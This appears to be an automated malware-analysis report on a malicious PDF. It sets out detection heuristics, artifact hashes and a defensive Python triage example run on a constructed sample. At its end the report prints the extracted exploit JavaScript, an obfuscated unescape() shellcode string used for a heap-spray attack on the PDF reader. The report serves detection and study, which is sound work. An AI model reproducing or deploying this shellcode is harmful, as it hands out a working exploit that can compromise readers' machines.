Verdict: MALICIOUS (risk score 120)
MITRE ATT&CK: T1059.001 (Command and Scripting Interpreter: PowerShell), T1204.002 (User Execution: Malicious File). The PowerShell mapping is the analyser's own; none of the static artifacts below show PowerShell being invoked, so treat that technique as unconfirmed by this report.

Malware Insights
The PDF carries embedded JavaScript (PDF_JAVASCRIPT and PDF_JS heuristics). The extracted script, javascript_obj0031_000.js, assembles a shellcode string with unescape(), and the critical PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY rule identifies it as an obfuscated multi-stage heap-spray exploit against the PDF reader. The second-stage Windows payload does not need to be fetched from the network: it is carried inside the document as the 1.2 MB embedded file 'k1', whose entropy of 8.00 indicates packed or encrypted content. The document metadata names PScript5.dll as the creator. That is the Windows PostScript printer driver behind ordinary print-to-PDF workflows, and creator metadata is trivially forged, so it is not an indicator in either direction.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9980
Heuristics (7)
- JavaScript action (low, 2 related findings): PDF_JAVASCRIPT. PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Obfuscated multi-stage PDF JavaScript heap-spray exploit (critical): PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY. PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
- Embedded JS stream (low): PDF_JS. PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded file (low): PDF_EMBEDDED. PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
- Object number defined twice with different bodies (info): PDF_DUPLICATE_OBJ_BODY_INCREMENTAL. The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Suspicious extracted artifact (info): EXTRACTED_FILE_STATIC_TRIAGE. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info): EMBEDDED_URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All five URLs below are standard XMP/RDF schema namespace identifiers found in the document text, i.e. ordinary metadata rather than contact points:
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
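The duplicate-object, /JavaScript, /JS and /EmbeddedFile heuristics above, and the entropy reading reported for the carved artifact further down, can be reproduced with a few lines of static triage. The following is an added example written for this page, not the analyser's own code: it scans a constructed minimal PDF (not the analysed sample) in which an incremental update redefines object 5, shows how a first-wins and a last-wins reader resolve that object differently, flags the active-content keys, and computes Shannon entropy over an embedded stream. The regular expressions, the key list and the 7.5 entropy threshold are assumptions made for the example.

```python
import re
from collections import Counter, defaultdict
from math import log2

# Constructed sample (not the analysed file): a minimal PDF with an incremental
# update that redefines object 5. The original body is a harmless /URI action;
# the appended copy swaps in a /JavaScript action, so first-wins and last-wins
# parsers disagree about what /OpenAction runs. Object 8 is a 16-byte embedded
# file with 16 distinct byte values, so its entropy is exactly 4.0 bits/byte.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R"
    b" /Names << /EmbeddedFiles << /Names [(k1) 7 0 R] >> >> >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"5 0 obj << /S /URI /URI (http://example.invalid/) >> endobj\n"
    b"7 0 obj << /Type /Filespec /F (k1) /EF << /F 8 0 R >> >> endobj\n"
    b"8 0 obj << /Type /EmbeddedFile /Length 16 >> stream\n"
    b"\x8d\x1f\xa2\x77\x03\xe9\x5c\xb0\x44\xf1\x28\x9a\x6e\xd3\x0b\x57\n"
    b"endstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
    # incremental update appended after the first %%EOF
    b"5 0 obj << /S /JavaScript /JS 6 0 R >> endobj\n"
    b"6 0 obj << /Length 30 >> stream\n"
    b'app.alert(unescape("%u9090"));\n'
    b"endstream endobj\n"
    b"trailer << /Root 1 0 R /Prev 9 >>\n%%EOF\n"
)

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
# Keys that make an object "active content". The \b keeps /EmbeddedFile from
# matching the /EmbeddedFiles name-tree key and /JS from matching /JavaScript.
ACTIVE_KEYS = {
    "PDF_JAVASCRIPT": re.compile(rb"/JavaScript\b"),
    "PDF_JS": re.compile(rb"/JS\b"),
    "PDF_EMBEDDED": re.compile(rb"/EmbeddedFile\b"),
}

def parse_objects(data):
    """All 'N G obj ... endobj' definitions in file order (duplicates kept)."""
    return [(int(m.group(1)), int(m.group(2)), m.group(3)) for m in OBJ_RE.finditer(data)]

def duplicate_bodies(objs):
    """{(N, G): [body, ...]} for object ids defined more than once with differing bytes."""
    seen = defaultdict(list)
    for num, gen, body in objs:
        seen[(num, gen)].append(body)
    return {k: v for k, v in seen.items() if len(set(v)) > 1}

def resolve(objs, num, gen=0, policy="last"):
    """Body a first-wins or last-wins reader would use for object (num, gen)."""
    bodies = [b for n, g, b in objs if (n, g) == (num, gen)]
    if not bodies:
        return None
    return bodies[-1] if policy == "last" else bodies[0]

def active_keys(body):
    return sorted(name for name, rx in ACTIVE_KEYS.items() if rx.search(body))

def shannon_entropy(data):
    """Bits per byte; 8.0 means every byte value is equally likely (packed/encrypted)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * log2(c / n) for c in Counter(data).values())

def stream_data(body):
    m = STREAM_RE.search(body)
    return m.group(1) if m else b""

def triage(data):
    """Static findings in the shape of the report's heuristics: (rule, severity, detail)."""
    objs = parse_objects(data)
    findings = []
    for (num, gen), bodies in duplicate_bodies(objs).items():
        first_keys = active_keys(resolve(objs, num, gen, "first"))
        last_keys = active_keys(resolve(objs, num, gen, "last"))
        # Body-only differences are normal in incremental updates; raise severity
        # only when one of the definitions carries active content.
        sev = "high" if first_keys or last_keys else "info"
        findings.append(("PDF_DUPLICATE_OBJ_BODY", sev,
                         f"{num} {gen} obj x{len(bodies)}: first-wins={first_keys} last-wins={last_keys}"))
    for num, gen, body in objs:
        for key in active_keys(body):
            findings.append((key, "low", f"{num} {gen} obj"))
        if ACTIVE_KEYS["PDF_EMBEDDED"].search(body):
            h = shannon_entropy(stream_data(body))
            if h > 7.5:  # threshold is an assumption for this example, not the analyser's
                findings.append(("EXTRACTED_FILE_STATIC_TRIAGE", "info",
                                 f"{num} {gen} obj embedded stream entropy {h:.2f}"))
    return findings

if __name__ == "__main__":
    for rule, sev, detail in triage(SAMPLE_PDF):
        print(f"{rule:28} {sev:5} {detail}")
```

On the constructed file the duplicate finding is raised to high because the last-wins body carries /JavaScript while the first-wins body is a plain /URI action; a reader that trusts the first definition and a reader that trusts the last will execute different things, which is exactly the parser-confusion shape the heuristic describes. The entropy of the toy embedded stream is 4.0 bits per byte; a value at the 8.0 ceiling, as reported for k1, is what packed or encrypted data looks like.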
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| k1 | pdf-embedded-file | PDF EmbeddedFile object 26 at offset 0x1EC1 | 1206312 bytes | d5005e6ee2e649716afeda73fc5624d60ddac2ec2e3497a03f11116991a6a4e7 |
| javascript_obj0031_000.js | pdf-javascript-stream | PDF /JS object 31 at offset 0x12B202 | 5553 bytes | 9029ea2e74558adf2ab160dcd562f29685141d2d5f8325345546e0860ea614a6 |

Detection for k1: ClamAV reports no threats. Obfuscation or payload: likely; the carved artifact's entropy is 8.00, consistent with packed or encrypted content. A clean ClamAV result on a stream at maximal entropy means only that no signature matched the packed bytes, not that the payload is benign.
Preview of javascript_obj0031_000.js (first 1,000 lines of the extracted script):
var UHNijmYGB=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = UHNijmYGB("%u\x39\x30\x39\x30%u\x39\x30\x39\x30%u\x39\x30\x39\x30%u\x65\x62\x39\x30%u5\x6518%u5\x6256%u068\x61%u303\x63%u1474%u6\x6266%u49\x630"+
"%u8\x6146%u\x33226%u88\x634%u430\x33%u\x65\x6246%u\x658\x65\x62%u\x66\x66\x653%u\x66\x66\x66\x66"+
"%u4445%u5843%u6544%u6444%u6444%u4d43%u5744%u4941%u5a4e%u5942%u5a4a%u5444"+
"%u5942%u5a4a%u6844%u5942%u6b43%u7844%u584d%u5942%u5a4a%u6c44%u4543%u4a41"+
"%u584d%u4b43%u4943%u6141%u6944%u6444%u6444%u6444%u5849%u6344%u5142%u4d41"+
"%u6c44%u5142%u4e41%u674b%u584b%u7841%u6e43%u6541%u4a41%u7a4a%u5942%u7743"+
"%u474b%u474b%u5942%u7a47%u5844%u5942%u4f43%u4c44%u6343%u6744%u7845%u5942"+
"%u5143%u7a52%u5942%u4143%u4444%u6744%u5441%u6a41%u5044%u5243%u5942%u5044"+
"%u5942%u6744%u5845%u5744%u7641%u5744%u4941%u7541%u5a46%u5642%u4941%u6f43"+
"%u6344%u4841%u4641%u6944%u6744%u7141%u6241%u5945%u584b%u6743%u474b%u4c44"+
"%u6e43%u6841%u5942%u4143%u474b%u6744%u5441%u5947%u5942%u6844%u5043%u5942"+
"%u4143%u7844%u6744%u5441%u5942%u674b%u5942%u6744%u4c41%u5849%u7a4e%u474b"+
"%u7844%u7a43%u4a41%u4e41%u7a47%u5a4e%u6444%u6444%u6444%u6444%u7143%u6444"+
"%u784d%u7a47%u4743%u4b43%u7343%u6444%u674b%u6444%u6444%u7641%u6e43%u5844"+
"%u7641%u6e43%u5343%u7641%u4e43%u7a52%u5744%u6445%u5947%u5942%u5643%u4743"+
"%u5942%u6643%u5844%u5942%u5a45%u6142%u4445%u4446%u4e41%u5a46%u5644%u4a41"+
"%u5644%u4b41%u7842%u7741%u4241%u7741%u4341%u6b41%u5945%u7143%u6444%u784d"+
"%u7a47%u7a4a%u4b43%u7641%u6e43%u4743%u5942%u4e43%u5844%u4943%u7641%u6e43"+
"%u5743%u7641%u4e43%u7844%u5942%u4e43%u7a4a%u4d44%u4e43%u4343%u5142%u6643"+
"%u4343%u6444%u6443%u4446%u7641%u6e43%u5743%u7641%u4e43%u6c44%u4a41%u7846"+
"%u5543%u6a44%u6541%u5142%u6b42%u6742%u6343%u7241%u4542%u7441%u6b44%u5744"+
"%u4341%u5842%u6447%u5443%u6744%u4e41%u6d42%u7742%u7344%u6444%u6743%u7244"+
"%u5a47%u7341%u7444%u416e%u6243%u6e44%u6141%u5a46%u6c44%u5341%u6d43%u584d"+
"%u4942%u6643%u5641%u4a42%u7741%u5842%u6a44%u6541%u4542%u6744%u6844%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6942"+
"%u6942%u6942%u6942%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6f43%u5a47%u7643%u6b43%u4a44"+
"%u5a47%u6343%u5a47%u6444%u6141%u6444%u6444%u6444%u6444%u4643%u5342%u6441"+
"%u6d43%u6444%u6444%u6444%u6141%u5a46%u7741%u7641%u7641%u5942%u5941%u5942"+
"%u5845%u5942%u7741%u5942%u4741%u5142%u4841%u5444%u6141%u5946%u7741%u7641"+
"%u7641%u5744%u6445%u5849%u5643%u5343%u5142%u7a47%u5343%u674b%u5744%u6445"+
"%u4a43%u7641%u6e43%u5343%u7641%u4e43%u474b%u5944%u5242%u6842%u7644%u6444"+
"%u6943%u6541%u5944%u5242%u6942%u7644%u6444%u6c43%u6c41%u7343%u7641%u6444"+
"%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5a52%u4b43%u7343"+
"%u7641%u6444%u6444%u6444%u7641%u4e43%u6844%u5942%u4141%u5942%u7a47%u5a52"+
"%u6744%u4841%u5142%u6141%u6144%u4f41%u6444%u6444%u7641%u6e43%u5a52%u7641"+
"%u4e43%u7444%u7143%u6444%u7143%u6444%u7343%u6444%u416e%u6444%u6444%u7641"+
"%u6e43%u5343%u7641%u4e43%u4444%u7143%u6444%u784d%u7a47%u4743%u4b43%u7143"+
"%u674b%u784d%u7a47%u4f43%u4b43%u7641%u6e43%u5343%u7641%u4e43%u7a52%u7143"+
"%u6444%u7143%u6444%u7343%u7444%u416e%u6444%u6444%u7641%u6e43%u5343%u7641"+
"%u4e43%u4444%u4e43%u7143%u6444%u7343%u5242%u6444%u6444%u6444%u7143%u6644"+
"%u7143%u6444%u7143%u6544%u7343%u6444%u6444%u6444%u5a4a%u784d%u7a47%u7343"+
"%u4b43%u5142%u7a47%u7044%u6144%u6241%u6e44%u5942%u5845%u5942%u7641%u4e43"+
"%u5942%u6541%u7641%u5947%u7044%u6141%u7841%u7641%u7641%u7641%u4643%u5142"+
"%u7141%u7641%u6e43%u6644%u6241%u5a4b%u5849%u7a47%u5743%u7343%u6444%u674b"+
"%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5844%u5942%u7a47"+
"%u4f43%u5849%u7a47%u4343%u6141%u5143%u7741%u7641%u7641%u4e43%u5744%u6445"+
"%u4a43%u784d%u7a47%u7343%u4b43%u5142%u7a47%u4c44%u6144%u6241%u6e44%u5942"+
"%u5845%u4242%u4242%u4e43%u5942%u6541%u7641%u5947%u4c44%u6141%u7841%u7641"+
"%u7641%u7641%u4643%u7143%u6444%u7143%u7641%u7641%u4e43%u674b%u4242%u4242"+
"%u4242%u4e43%u5942%u6541%u5142%u4d41%u5945%u7143%u5845%u6141%u7946%u6444"+
"%u6444%u6444%u5849%u7a47%u7541%u7641%u6e43%u6c44%u6141%u5743%u6444%u6444"+
"%u6444%u5849%u7a47%u5945%u7143%u6444%u784d%u7a47%u7141%u4b43%u7641%u6e43"+
"%u5945%u7641%u6e43%u6c44%u7641%u6e43%u7541%u6141%u6843%u6444%u6444%u6444"+
"%u5942%u7a47%u7141%u6445%u4b41%u674b%u6444%u4541%u4541%u4e43%u5942%u6541"+
"%u5142%u4d41%u7141%u7143%u5845%u6141%u4c43%u6444%u6444%u6444%u5849%u7a47"+
"%u7541%u5942%u5643%u6c44%u5942%u7a47%u6844%u4841%u6941%u7444%u5947%u5942"+
"%u4841%u4b43%u7641%u6e43%u7541%u6141%u5043%u6444%u6444%u6444%u6445%u4b41"+
"%u6c44%u6444%u4541%u4541%u4541%u4e43%u5942%u6541%u4843%u5942%u7a47%u6c44"+
"%u784d%u4b43%u6744%u5942%u7a52%u5142%u4941%u674b%u784d%u5942%u7641%u7741"+
"%u7741%u7741%u5a45%u5a41%u4744%u4241%u5342%u6841%u5242%u5242%u5242%u5242"+
"%u6f43%u4445%u5a45%u4841%u5242%u5242%u6444%u6444%u6e43%u6244%u4841%u4445"+
"%u7444%u5142%u4941%u6644%u5941%u6841%u784b%u4b41%u6447%u6445%u4b41%u674b"+
"%u6444%u7641%u4144%u674b%u4444%u5a4a%u6444%u7641%u4144%u6c44%u4444%u5a4a"+
"%u6444%u7641%u4144%u6444%u4444%u5a4a%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u3030");